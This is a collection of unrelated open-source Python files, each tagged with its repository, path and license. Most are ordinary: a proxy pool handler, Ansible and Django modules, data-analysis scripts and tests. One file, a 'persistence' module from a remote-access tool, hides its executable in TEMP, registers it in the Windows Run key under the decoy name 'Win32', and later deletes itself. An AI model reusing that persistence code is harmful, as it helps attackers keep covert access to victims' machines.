""" Proxy CRUD operator"""
def __init__(self):
self.conf = ConfigHandler()
self.db = DbClient(self.conf.dbConn)
self.db.changeTable(self.conf.tableName)
def get(self, https=False):
"""
return a proxy
Args:
https: True/False
        Returns:
            a Proxy object, or None if no proxy is available
"""
proxy = self.db.get(https)
return Proxy.createFromJson(proxy) if proxy else None
def pop(self, https):
"""
return and delete a useful proxy
:return:
"""
proxy = self.db.pop(https)
if proxy:
return Proxy.createFromJson(proxy)
return None
def put(self, proxy):
"""
put proxy into use proxy
:return:
"""
self.db.put(proxy)
def delete(self, proxy):
"""
delete useful proxy
:param proxy:
:return:
"""
return self.db.delete(proxy.proxy)
def getAll(self, https=False):
"""
get all proxy from pool as Proxy list
:return:
"""
proxies = self.db.getAll(https)
return [Proxy.createFromJson(_) for _ in proxies]
def exists(self, proxy):
"""
check proxy exists
:param proxy:
:return:
"""
return self.db.exists(proxy.proxy)
def getCount(self):
"""
return raw_proxy and use_proxy count
:return:
"""
total_use_proxy = self.db.getCount()
return {'count': total_use_proxy}
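# Minimal usage sketch (illustrative only -- it assumes the database configured
# through ConfigHandler is reachable and already holds proxies):
#
#   handler = ProxyHandler()
#   candidate = handler.get(https=True)   # a Proxy object, or None if the pool is empty
#   print(handler.getCount())             # e.g. {'count': 42}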
| jhao104/proxy_pool | handler/proxyHandler.py | Python | mit | 2,079 |
import os
import sys
import subprocess
import shutil
import requests
import utils
#try to hide it
SERVICE_NAME = "Win32"
if getattr(sys, 'frozen', False):
EXECUTABLE_PATH = sys.executable
elif __file__:
EXECUTABLE_PATH = __file__
else:
EXECUTABLE_PATH = ''
EXECUTABLE_NAME = os.path.basename(EXECUTABLE_PATH)
def install():
if not is_installed():
stdin, stdout, stderr = os.popen3("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v %s /t REG_SZ /d %s" % (SERVICE_NAME, os.environ["TEMP"] + "\\" + EXECUTABLE_NAME))
shutil.copyfile(EXECUTABLE_PATH, os.environ["TEMP"] + "/" + EXECUTABLE_NAME)
def clean():
subprocess.Popen("reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v %s" % SERVICE_NAME,
shell=True)
subprocess.Popen(
"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v %s /t REG_SZ /d %s" % (SERVICE_NAME, "\"cmd.exe /c del %USERPROFILE%\\" + EXECUTABLE_NAME + "\""),
shell=True)
def is_installed():
output = os.popen(
"reg query HKCU\Software\Microsoft\Windows\Currentversion\Run /f %s" % SERVICE_NAME)
if SERVICE_NAME in output.read():
return True
else:
return False
def run(action):
try:
if action == "install":
install()
utils.send_output("Persistence installed")
elif action == "remove":
clean()
utils.send_output("Persistence removed")
elif action == "status":
if is_installed():
utils.send_output("Persistence is ON")
else:
utils.send_output("Persistence is OFF")
except Exception, exc:
utils.send_output(exc)
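# Illustrative call flow: run('status') checks the registry Run key through
# is_installed() and reports "Persistence is ON" or "Persistence is OFF".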
def help():
help_text = """
Usage: persistence install|remove|status
Manages persistence.
"""
return help_text
| EzLucky/Wares | client/modules/persistence.py | Python | mit | 1,886 |
# -*- coding: utf-8 -*-
from pymongo import MongoClient
import numpy as np
import gensim, cython, codecs, os, logging, re, json, time
from gensim import models, corpora
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
# from nltk.corpus import stopword
# from nltk.stem import *
# from nltk.stem import WordNetLemmatizer
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
# Variables
hostname = "localhost"
port = 27017
database_name = "twitter-data"
collection_name = "ns"
#
DATA_DIR = '/home/nipg1/Documents/summer_project/data/'+ collection_name + '/models'
LOG_DIR = '/home/nipg1/Documents/summer_project/data/'+ collection_name + '/embedding_logs'
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
if not os.path.exists(LOG_DIR):
os.makedirs(LOG_DIR)
sep = ' ' # delimiter/separator
stopwords = ['the', 'be', 'and', 'of', 'a', 'an', 'in', 'to', 'or', 'have', 'has',
'it', 'i', 'that', 'for', 'you', 'he', 'with', 'on', 'do','say',
'this', 'they', 'at', 'but', 'we', 'rt']
alphanumeric = re.compile('[\W]+', re.UNICODE)
stopword_patterns = ['www\.[^ ]+\.[^ ]+', 'https?:\/\/[^ ]+', '([@#])([a-z\d_]+)', '^\d$'] #links, mentions, hashtags, numbers
word_endings = u'.,!?:…"\'/-\n\t'
cores = 4
word_dimension = 200
stopword_pattern = re.compile("|".join(["^" + stopword + "$" for stopword in stopwords] + stopword_patterns))
# standard deviation of vector
def normalize(X, axis=None):
if(sum(X)==0):
return X
return ((X - np.mean(X, axis=axis, keepdims=True)) / np.std(X, axis=axis, keepdims=True))
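# A quick illustrative check (values rounded): normalize(np.array([1.0, 2.0, 3.0]))
# gives approximately [-1.2247, 0.0, 1.2247] -- zero mean, unit standard deviation.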
def word_processor(word):
word = word.rstrip(word_endings).lower()
word = re.sub(stopword_pattern, '', word)
word = word.rstrip(word_endings)
return word
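# Illustrative examples (the handle below is made up): word_processor('Running!')
# returns 'running' (trailing punctuation stripped and lower-cased), while
# word_processor('@SomeUser') returns '' because mentions match stopword_pattern.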
class MyCorpus(object):
def __init__(self, key, sep):
# self.search_filter = json.loads(search_filter)
self.sep = sep
self.key = key
def __iter__(self):
        for tweet in collection.find({"text": {"$exists": "true"}, 'lang': 'en'}, {'text': 1}).limit(10000):
yield filter(None, [ word_processor(word.encode('ascii', 'ignore').decode('ascii').translate(None, '()!@#?$.:1234567890%+*/+[]=,;-_"\'\\').lower()) for word in tweet[self.key].split(self.sep)])
class MyCorpus2(object):
def __init__(self, key, sep):
# self.search_filter = json.loads(search_filter)
self.sep = sep
self.key = key
def __iter__(self):
for tweet in collection.find({"text": {"$exists": "true"}, 'lang':'en'}, {'text': 1, 'timestamp_ms':1}).limit(10000):
yield filter(None, [ word_processor(word) for word in tweet[self.key].split(self.sep)]), tweet['timestamp_ms']
client = MongoClient(hostname, port)
db = client[database_name]
collection = db[collection_name]
corpus = MyCorpus('text', sep)
word2vec = gensim.models.KeyedVectors.load_word2vec_format('/home/nipg1/Documents/summer_project/data/models/GoogleNews-vectors-negative300.bin', binary=True, limit=100000)
#word2vec = models.Word2Vec.load(os.path.join(DATA_DIR, '/home/nipg1/Documents/summer_project/data/models/GoogleNews-vectors-negative300.bin'))
dictionary = corpora.Dictionary.load(os.path.join(DATA_DIR, 'words.dict'))
tfidf = models.tfidfmodel.TfidfModel.load(os.path.join(DATA_DIR, 'tfidf_model'))
feature = []
# err = codecs.open(os.path.join(LOG_DIR, 'errors.txt'), 'w', encoding="utf-8")
metadata = codecs.open(os.path.join(LOG_DIR, 'metadata.tsv'), 'w', encoding="utf-8")
metadata.write("Tweet\tTime\n")
for tweet, epoch in MyCorpus2('text', sep):
tweet_tfidf = tfidf[dictionary.doc2bow(tweet)]
metadata.write(' '.join(tweet) + '\t')
# not_in_dict = []
    v = np.zeros(word2vec.vector_size)  # match the dimensionality of the loaded embedding model
for word, w_tfidf in tweet_tfidf:
if dictionary[word] in word2vec:
v += word2vec[dictionary[word]] * w_tfidf
# else:
# err.write(dictionary[word] + '\n')
# not_in_dict.append(dictionary[word])
v = normalize(v)
feature.append(v)
# metadata.write(' '.join(not_in_dict) + '\t')
metadata.write(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(epoch)/1000)) + '\n')
feature = np.array(feature)
| kgyl/twitter-data-analysis | scripts/not_used/process_data.py | Python | gpl-3.0 | 4,274 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_ap
short_description: Manage top level Application Profile (AP) objects (fv:Ap)
description:
- Manage top level Application Profile (AP) objects on Cisco ACI fabrics
notes:
- This module does not manage EPGs, see M(aci_epg) to do this.
- The used C(tenant) must exist before using this module in your playbook.
The M(aci_tenant) module can be used for this.
seealso:
- module: aci_tenant
- name: APIC Management Information Model reference
description: More information about the internal APIC class B(fv:Ap).
link: https://developer.cisco.com/docs/apic-mim-ref/
author:
- Swetha Chunduri (@schunduri)
version_added: '2.4'
options:
tenant:
description:
- The name of an existing tenant.
required: yes
aliases: [ tenant_name ]
ap:
description:
- The name of the application network profile.
required: yes
aliases: [ app_profile, app_profile_name, name ]
description:
description:
- Description for the AP.
aliases: [ descr ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: aci
'''
EXAMPLES = r'''
- name: Add a new AP
aci_ap:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
ap: default
description: default ap
state: present
delegate_to: localhost
- name: Remove an AP
aci_ap:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
ap: default
state: absent
delegate_to: localhost
- name: Query an AP
aci_ap:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
ap: default
state: query
delegate_to: localhost
register: query_result
- name: Query all APs
aci_ap:
host: apic
username: admin
password: SomeSecretPassword
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: string
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: string
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: string
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: string
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: string
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
tenant=dict(type='str', aliases=['tenant_name']), # Not required for querying all objects
ap=dict(type='str', aliases=['app_profile', 'app_profile_name', 'name']), # Not required for querying all objects
description=dict(type='str', aliases=['descr'], required=False),
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['tenant', 'ap']],
['state', 'present', ['tenant', 'ap']],
],
)
ap = module.params['ap']
description = module.params['description']
state = module.params['state']
tenant = module.params['tenant']
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class='fvTenant',
aci_rn='tn-{0}'.format(tenant),
module_object=tenant,
target_filter={'name': tenant},
),
subclass_1=dict(
aci_class='fvAp',
aci_rn='ap-{0}'.format(ap),
module_object=ap,
target_filter={'name': ap},
),
)
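    # Illustrative example: with tenant=production and ap=default, the object URL
    # built above ends in /api/mo/uni/tn-production/ap-default.json.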
aci.get_existing()
if state == 'present':
aci.payload(
aci_class='fvAp',
class_config=dict(
name=ap,
descr=description,
),
)
aci.get_diff(aci_class='fvAp')
aci.post_config()
elif state == 'absent':
aci.delete_config()
aci.exit_json()
if __name__ == "__main__":
main()
| veger/ansible | lib/ansible/modules/network/aci/aci_ap.py | Python | gpl-3.0 | 6,984 |
"""Test that GOEnrichmentStudy fails elegantly given incorrect stimulus.
python test_goea_errors.py
"""
__copyright__ = "Copyright (C) 2016-2017, DV Klopfenstein, H Tang. All rights reserved."
__author__ = "DV Klopfenstein"
import sys
import os
from goatools.base import get_godag
from goatools.go_enrichment import GOEnrichmentStudy
from goatools.associations import read_associations
ROOT = os.path.dirname(os.path.abspath(__file__)) + "/../data/"
def init_goea(**kws):
"""Initialize GODag and GOEnrichmentStudy."""
godag = get_godag(os.path.join(os.getcwd(), "go-basic.obo"), loading_bar=None)
assoc = read_associations(ROOT + "association", no_top=True)
popul_ids = [line.rstrip() for line in open(ROOT + "population")]
methods = kws['methods'] if 'methods' in kws else ['not_bonferroni']
study_ids = [line.rstrip() for line in open(ROOT + "study")]
return GOEnrichmentStudy(popul_ids, assoc, godag, methods=methods), study_ids
def run_method_bad_ini():
"""Test attempting to use an unsupported method in initialization."""
goea, study_ids = init_goea(methods=['not_fdr'])
# Test that method(s) set during initialization are valid
goea.run_study(study_ids)
def run_method_bad_run():
"""Test attempting to use an unsupported method in run."""
goea, study_ids = init_goea()
# Test that method(s) set while running a GOEA on a study are valid
goea.run_study(study_ids, methods=['invalid_method'])
def test_all(log=sys.stdout):
"""Run all error tests."""
tests = [
(run_method_bad_ini, "FATAL: UNRECOGNIZED METHOD(not_fdr)"),
(run_method_bad_run, "FATAL: UNRECOGNIZED METHOD(not_bonferroni)"),
]
for test, exp_errmsg in tests:
try:
test()
except Exception as inst:
# Run next test
if str(inst).startswith(exp_errmsg):
log.write("Test PASSED. Expected error message seen: {EXP}\n".format(
EXP=exp_errmsg))
else:
raise Exception("EXPECTED({EXP}). ACTUAL({ACT})".format(
EXP=exp_errmsg, ACT=inst))
if __name__ == '__main__':
test_all()
# Copyright (C) 2016-2017, DV Klopfenstein, H Tang. All rights reserved.
| lileiting/goatools | tests/test_goea_errors.py | Python | bsd-2-clause | 2,261 |
# coding=UTF-8
from django.db import models
from django.contrib.sites.models import Site
from django.contrib.auth.models import User
from django.template.defaultfilters import slugify
from django.utils.translation import ugettext as _
from django.template import loader, Context
from django.core.urlresolvers import reverse
from django.core.mail import send_mail
from django.conf import settings
import datetime
import cPickle as pickle
import base64
import Image, ImageFilter
import os.path
AVATAR_SIZES = (128, 96, 64, 48, 32, 24, 16)
class BaseProfile(models.Model):
"""
User profile model
"""
user = models.ForeignKey(User, unique=True)
date = models.DateTimeField(default=datetime.datetime.now)
latitude = models.DecimalField(max_digits=10, decimal_places=6, blank=True, null=True)
longitude = models.DecimalField(max_digits=10, decimal_places=6, blank=True, null=True)
location = models.CharField(max_length=255, blank=True)
class Meta:
abstract = True
def has_avatar(self):
return Avatar.objects.filter(user=self.user, valid=True).count()
def __unicode__(self):
return _("%s's profile") % self.user
def get_absolute_url(self):
return reverse("profile_public", args=[self.user])
class Avatar(models.Model):
"""
Avatar model
"""
#image = models.ImageField(upload_to="avatars/%Y/%b/%d")
image = models.ImageField(upload_to="avatars/")
user = models.ForeignKey(User)
date = models.DateTimeField(auto_now_add=True)
valid = models.BooleanField()
class Meta:
unique_together = (('user', 'valid'),)
def __unicode__(self):
return _("%s's Avatar") % self.user
def delete(self):
base, filename = os.path.split(self.image.path)
name, extension = os.path.splitext(filename)
for key in AVATAR_SIZES:
try:
os.remove(os.path.join(base, "%s.%s%s" % (name, key, extension)))
except:
pass
super(Avatar, self).delete()
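    # e.g. for an image stored as "avatars/portrait.png" (an illustrative name), the
    # resized copies removed above would be "avatars/portrait.128.png",
    # "avatars/portrait.96.png", ... down to "avatars/portrait.16.png",
    # one per entry in AVATAR_SIZES.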
def save(self):
for avatar in Avatar.objects.filter(user=self.user, valid=self.valid).exclude(id=self.id):
base, filename = os.path.split(avatar.image.path)
name, extension = os.path.splitext(filename)
for key in AVATAR_SIZES:
try:
os.remove(os.path.join(base, "%s.%s%s" % (name, key, extension)))
except:
pass
avatar.delete()
super(Avatar, self).save()
class EmailValidationManager(models.Manager):
"""
Email validation manager
"""
def verify(self, key):
try:
verify = self.get(key=key)
if not verify.is_expired():
verify.user.email = verify.email
verify.user.save()
verify.delete()
return True
else:
verify.delete()
return False
except:
return False
def getuser(self, key):
try:
return self.get(key=key).user
except:
return False
def add(self, user, email):
"""
Add a new validation process entry
"""
while True:
key = User.objects.make_random_password(70)
try:
EmailValidation.objects.get(key=key)
except EmailValidation.DoesNotExist:
self.key = key
break
template_body = "userprofile/email/validation.txt"
template_subject = "userprofile/email/validation_subject.txt"
site_name, domain = Site.objects.get_current().name, Site.objects.get_current().domain
body = loader.get_template(template_body).render(Context(locals()))
subject = loader.get_template(template_subject).render(Context(locals())).strip()
send_mail(subject=subject, message=body, from_email=None, recipient_list=[email])
user = User.objects.get(username=str(user))
self.filter(user=user).delete()
return self.create(user=user, key=key, email=email)
class EmailValidation(models.Model):
"""
Email Validation model
"""
user = models.ForeignKey(User, unique=True)
email = models.EmailField(blank=True)
key = models.CharField(max_length=70, unique=True, db_index=True)
created = models.DateTimeField(auto_now_add=True)
objects = EmailValidationManager()
def __unicode__(self):
return _("Email validation process for %(user)s") % { 'user': self.user }
def is_expired(self):
return (datetime.datetime.today() - self.created).days > 0
def resend(self):
"""
Resend validation email
"""
template_body = "userprofile/email/validation.txt"
template_subject = "userprofile/email/validation_subject.txt"
site_name, domain = Site.objects.get_current().name, Site.objects.get_current().domain
key = self.key
body = loader.get_template(template_body).render(Context(locals()))
subject = loader.get_template(template_subject).render(Context(locals())).strip()
send_mail(subject=subject, message=body, from_email=None, recipient_list=[self.email])
self.created = datetime.datetime.now()
self.save()
return True
| bithinalangot/ecidadania-dev | src/apps/thirdparty/userprofile/models.py | Python | gpl-3.0 | 5,338 |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "PolyTrend", cycle_length = 0, transform = "BoxCox", sigma = 0.0, exog_count = 100, ar_order = 12); | antoinecarme/pyaf | tests/artificial/transf_BoxCox/trend_PolyTrend/cycle_0/ar_12/test_artificial_128_BoxCox_PolyTrend_0_12_100.py | Python | bsd-3-clause | 263 |
from biicode.common.test import model_creator as mother, testfileutils
from biicode.common.edition.processors.cpp_implementation import CPPImplementationsProcessor
from biicode.common.model.cells import SimpleCell
from biicode.common.model.bii_type import BiiType, CPP
from nose_parameterized import parameterized
from biicode.common.model.brl.block_cell_name import BlockCellName
from biicode.common.model.blob import Blob
from biicode.common.model.content import Content
from biicode.common.edition.parsing.cpp.drl_parser import DRLCPPParser
from biicode.common.edition.processors.parse_processor import ParseProcessor
from biicode.common.edition.block_holder import BlockHolder
from biicode.common.model.resource import Resource
from mock import Mock
from biicode.common.output_stream import OutputStream
from biicode.common.test.bii_test_case import BiiTestCase
crypto_header = """
namespace CryptoPP {
class CAST
{
protected:
static const word32 S[8][256];
};
}
"""
crypto_body = """
#include "cryptopp/cryptopp/pch.h"
#include "cryptopp/cryptopp/cast.h"
namespace CryptoPP{
// CAST S-boxes
int CAST::x = 1;
int CAST::y;
int z;
const word32 CAST::S[8][256] = {
{
0x30FB40D4UL, 0x9FA0FF0BUL, 0x6BECCD2FUL, 0x3F258C7AUL,
0x1E213F2FUL, 0x9C004DD3UL, 0x6003E540UL, 0xCF9FC949UL,
0xBFD4AF27UL, 0x88BBBDB5UL, 0xE2034090UL, 0x98D09675UL,
0x6E63A0E0UL, 0x15C361D2UL, 0xC2E7661DUL, 0x22D4FF8EUL
}}
"""
basic_class_header = '''
class MyClass{
public:
MyClass();
protected:
static int a;
};'''
basic_class_body = '''MyClass::MyClass(){}'''
class_static_var_body = '''int MyClass::a = 3;'''
basic_function_header = '''
void myFunction();'''
basic_function_body = '''void myFunction(){}'''
ns_class_header = '''
namespace NS{
class MyClass{
MyClass();
};
}'''
ns_class_body = '''namespace NS{
MyClass::MyClass(){}
}'''
ns_class_body2 = '''NS::MyClass::MyClass(){}'''
ns_function_header = '''
namespace NS{
void myFunction();
}'''
ns_function_body = '''namespace NS{
void myFunction(){}
}'''
ns_function_body2 = '''
void NS::myFunction(){}
'''
main_body = """
#include "cryptopp/cryptopp/pch.h"
#include "cryptopp/cryptopp/cast.h"
int main(){
return 0;
}
"""
no_main_body = """
#include "cryptopp/cryptopp/pch.h"
#include "cryptopp/cryptopp/cast.h"
"""
poco_header = """#ifndef SAX_LexicalHandler_INCLUDED
#define SAX_LexicalHandler_INCLUDED
#include "Poco/XML/XML.h"
#include "Poco/XML/XMLString.h"
namespace Poco {
namespace XML {
class XML_API LexicalHandler
{
public:
virtual void startDTD(const XMLString& name) = 0;
virtual void endDTD() = 0;
virtual void endCDATA() = 0;
virtual void comment(const XMLChar ch[], int start, int length) = 0;
protected:
virtual ~LexicalHandler();
};
} } // namespace Poco::XML
#endif // SAX_LexicalHandler_INCLUDED
"""
poco_src_body = """#include "Poco/SAX/LexicalHandler.h"
namespace Poco {
namespace XML {
LexicalHandler::~LexicalHandler()
{
}
} } // namespace Poco::XML
"""
using_ns_body = """using blobstore::onblocks::utils::ceilDivision;"""
using_ns_header = """namespace blobstore {
namespace onblocks {
namespace utils {
uint32_t intPow(uint32_t base, uint32_t exponent);
uint32_t ceilDivision(uint32_t dividend, uint32_t divisor);
uint32_t maxZeroSubtraction(uint32_t minuend, uint32_t subtrahend);
}
}
}
"""
class CPPImplementationProcessorTest(BiiTestCase):
    '''Tests the CPPImplementationsProcessor from two sources: source files in the
    tests folder and code snippets defined directly in this file.'''
def _process_from_contents(self, contents):
'''param contents: dict{name:code snippets}.
Will create a ProjectHolder, fill with the data and process it'''
resources = []
for name, content in contents.iteritems():
cell = SimpleCell(name, CPP)
block_name = cell.name.block_name
resources.append(Resource(cell, Content(name, load=Blob(content),
parser=DRLCPPParser())))
block_holder = BlockHolder(block_name, resources)
self._process(block_holder)
return block_holder
def _process_from_files(self, names):
'''param names: iterable of BlockCellNames. The user will be stripped, and the remaining
will be loaded from the test folder.
Will create a ProjectHolder, fill with the data and process it'''
block_holder = mother.get_block_holder(names, BiiType(CPP))
self._process(block_holder)
return block_holder
def _process(self, block_holder):
'''helper method that actually invokes the processor'''
for r in block_holder.simple_resources:
r.content.parse()
processor = CPPImplementationsProcessor()
processor.do_process(block_holder, Mock())
@parameterized.expand([
('user/geom/sphere.h', 'user/geom/sphere.cpp'),
# find extern implementations of fonts in freeglut
('user/glut/src/freeglut_font.c', 'user/glut/src/freeglut_font_data.c'),
('user/glut/include/GL/freeglut_std.h', 'user/glut/src/freeglut_glutfont_definitions.c'),
('user/gtest/include/gtest/internal/gtest-filepath.h', 'user/gtest/src/gtest-filepath.cc'),
('user/solver/systemsolver.h', 'user/solver/systemsolver.cpp'),
('user/sdl/include/SDL.h', 'user/sdl/src/SDL.c'),
('user/sdl/include/SDL_video.h', 'user/sdl/src/video/SDL_surface.c')
])
def test_implementation_from_files(self, header, source):
'''basic check that header is implemented by source'''
sources = [header, source]
block_holder = self._process_from_files(sources)
header = BlockCellName(header)
source = BlockCellName(source)
header_cell = block_holder[header.cell_name].cell
self.assertEqual({source}, header_cell.dependencies.implicit)
def test_find_csparse_implementations(self):
'''This tests check that the cs.h file requires or is implemented by all other files
in csparse, (they are all *.c files)'''
sources = []
for file_ in testfileutils.get_dir_files('csparse'):
sources.append('user/csparse/' + file_)
block_holder = self._process_from_files(sources)
#Checks
header = block_holder['cs.h'].cell
sources = set(sources)
sources.remove('user/csparse/cs.h')
self.assertEqual(sources, header.dependencies.implicit)
@parameterized.expand([
(crypto_header, crypto_body),
(basic_class_header, basic_class_body),
(basic_class_header, class_static_var_body),
(basic_function_header, basic_function_body),
(ns_class_header, ns_class_body),
(ns_class_header, ns_class_body2),
(ns_function_header, ns_function_body),
(ns_function_header, ns_function_body2),
(poco_header, poco_src_body)
])
def test_implementation_from_contents(self, header, source):
'''basic check that header is implemented by source. The contents of the files are defined
in snippets of code as strings'''
sources = {'user/block/header.h': header,
'user/block/body.cpp': source}
block_holder = self._process_from_contents(sources)
header = BlockCellName('user/block/header.h')
source = BlockCellName('user/block/body.cpp')
header_cell = block_holder['header.h'].cell
self.assertEqual({source}, header_cell.dependencies.implicit)
#Negative check
source_cell = block_holder['body.cpp'].cell
self.assertEqual(set(), source_cell.dependencies.implicit)
@parameterized.expand([
('', ''),
(crypto_header, ''),
('', basic_class_body),
(using_ns_header, using_ns_body)
])
def test_negative(self, header, source):
'''some basic negative tests, from snippets of code'''
sources = {'user/block/header.h': header,
'user/block/body.cpp': source}
block_holder = self._process_from_contents(sources)
header = BlockCellName('user/block/header.h')
source = BlockCellName('user/block/body.cpp')
header_cell = block_holder[header.cell_name].cell
self.assertEqual(set(), header_cell.dependencies.implicit)
#Negative check
source_cell = block_holder[source.cell_name].cell
self.assertEqual(set(), source_cell.dependencies.implicit)
def test_has_main(self):
'''some basic negative tests, from snippets of code'''
sources = {'user/block/body.cpp': main_body}
block_holder = self._process_from_contents(sources)
ParseProcessor().do_process(block_holder, OutputStream())
self.assertTrue(block_holder._resources['body.cpp'].content.parser.has_main_function())
sources = {'user/block/body.cpp': no_main_body}
block_holder = self._process_from_contents(sources)
ParseProcessor().do_process(block_holder, OutputStream())
self.assertFalse(block_holder._resources['body.cpp'].content.parser.has_main_function())
| zhangf911/common | test/edition/processors/cpp_implementation_test.py | Python | mit | 9,113 |
# -*- coding: utf-8 -*-
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################
## if SSL/HTTPS is properly configured and you want all HTTP requests to
## be redirected to HTTPS, uncomment the line below:
# request.requires_https()
if not request.env.web2py_runtime_gae:
## if NOT running on Google App Engine use SQLite or other DB
db = DAL('sqlite://storage.sqlite',pool_size=1,check_reserved=['all'])
else:
## connect to Google BigTable (optional 'google:datastore://namespace')
db = DAL('google:datastore')
## store sessions and tickets there
session.connect(request, response, db=db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))
## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'
#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Crud, Service, PluginManager, prettydate
auth = Auth(db)
crud, service, plugins = Crud(db), Service(), PluginManager()
## create all tables needed by auth if not custom tables
auth.define_tables(username=False, signature=False)
## configure email
mail = auth.settings.mailer
mail.settings.server = 'logging' or 'smtp.gmail.com:587'
mail.settings.sender = 'you@gmail.com'
mail.settings.login = 'username:password'
## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True
## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.
## register with janrain.com, write your domain:api_key in private/janrain.key
from gluon.contrib.login_methods.rpx_account import use_janrain
use_janrain(auth, filename='private/janrain.key')
#########################################################################
## Define your tables below (or better in another model file) for example
##
## >>> db.define_table('mytable',Field('myfield','string'))
##
## Fields can be 'string','text','password','integer','double','boolean'
## 'date','time','datetime','blob','upload', 'reference TABLENAME'
## There is an implicit 'id integer autoincrement' field
## Consult manual for more options, validators, etc.
##
## More API examples for controllers:
##
## >>> db.mytable.insert(myfield='value')
## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)
## >>> for row in rows: print row.id, row.myfield
#########################################################################
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
| AbsentMoniker/ECE463Honors | web2py/applications/welcome/models/db.py | Python | gpl-2.0 | 3,619 |
import logging
import re
import numpy
logger = logging.getLogger(__name__)
from hyo2.soundspeed.formats.readers.abstract import AbstractTextReader
from hyo2.soundspeed.profile.dicts import Dicts
from hyo2.soundspeed.base.callbacks.cli_callbacks import CliCallbacks
from hyo2.soundspeed.temp import coordinates
from hyo2.soundspeed.temp.regex_helpers import Profile, parseNumbers, getMetaFromTimeRE
# Identifier Input data Data to be used Comment
ssp_fmts_doc = '''
S00 D,c D,c
S01 D,c,T,S D,c,a(D,T,S,L) Same as S12, but used immediately.
S02 D,T,S D,c(D,T,S,L),a(D,T,S,L) Same as S22, but used immediately.
S03 D,T,C D,c(D,T,C,L),a(D,T,S,L) Same as S32,but used immediately.
S04 P,T,S D(P,T,S,L),c(P,T,S,L),a(P,T,S,L) Same as S42,but used immediately.
S05 P,T,C D(P,T,C,L),c(P,T,C,L),a(P,T,C,L) Same as S52,but used immediately.
S06 D,c,a D,c,a Same as S11,but used immediately.
S10 D,c D,c
S11 D,c,a D,c,a
S12 D,c,T,S D,c,a(D,T,S,L)
S13 D,c,a,f D,c,a Frequency dependent
S20 D,T,S D,c(D,T,S,L)
S21 D,T,S,a D,c(D,T,S,L),a
S22 D,T,S D,c(D,T,S,L),a(D,T,S,L)
S23 D,T,S,a,f D,c(D,T,S,L),a Frequency dependent
S30 D,T,C D,c(D,T,S,L)
S31 D,T,C,a D,c(D,T,S,L),a
S32 D,T,C D,c(D,T,S,L),a(D,T,S,L)
S33 D,T,C,a,f D,c(D,T,S,L),a Frequency dependent
S40 P,T,S D(P,T,S,L),c(P,T,S,L)
